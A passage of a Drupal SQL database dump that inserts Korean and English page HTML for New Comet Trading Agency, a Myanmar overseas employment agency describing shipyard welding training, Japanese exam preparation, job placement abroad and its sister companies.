lang=\"KO\">하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">동안</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 200</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">명</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">이상의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직원에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공했습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는 현재에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">한국</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">조선소들에 일하고 싶은 미얀마</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">각지에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">온</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">소수민족</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">형제들을 교통통신부</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산하</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">씬마락</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> (Sinmalike)</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">조선소에 트레이너들와 함께 훌령한 기능공이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">되도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">용접수업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있으며</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취업할 수 있게 취업들을 연계시키고 도와주고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">또한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">두바이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">말레이시아</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">싱가포</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">태국</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본 같은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국가에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일하기를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">원하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">청년들에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">받알 수 있도록&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스들을 제공하고 있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">New Comet Trading Agency Co.ltd</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">젊은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">치누들이 일본의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">개발한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">첨단</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기술을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">배우고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">꿈을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">실현할</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">교육을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하고 돕고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본으로 취업비자</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">연수비자로 가기</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">자격시험</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(JLPT, JFT, NAT-TEST, TOP-J)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">합격할</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">어학당도</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">개설</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및 교육을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">지원하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희는</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">”</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>”&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-bidi-font-weight:bold;mso-fareast-language:KO;\" lang=\"KO\">는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">우수한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기능인력을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">배출하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">해외로</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">파견하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하기</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">끊임없이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">노력하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p><o:p></o:p></p><p>&nbsp;</p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 1, 86, 'en', 0, '<h3>Welcome to Our Website \"NEW COMET TRADING AGENCY\"!!!!</h3><h3>안녕하세요.우리\"뉴코멧 영업 대행사\" 웹사이트 에서 환영합니다.</h3><img src=\"/sites/default/files/inline-images/new_comet_trading_agency_0.jpg\" data-align=\"center\" data-entity-uuid=\"42e9d2a3-e284-49bb-81cb-2510b37a5871\" data-entity-type=\"file\"><p><span style=\"font-size:14.0pt;line-height:107%;\">We, ``NEW COMET TRADING\'\' company, was established in 2004 and started operating with company registration number (295/2004-2005).</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) licence was obtained in 2023 and since then, the company has started to carry out service activities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">&nbsp;We, ``NEW COMET TRADING AGENCY\'\' company, which is a brother company, such as, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, NEW COMET Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan, and have paid the taxes set for the state. More than 100 employees were given employment opportunities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.</span></p><p><span 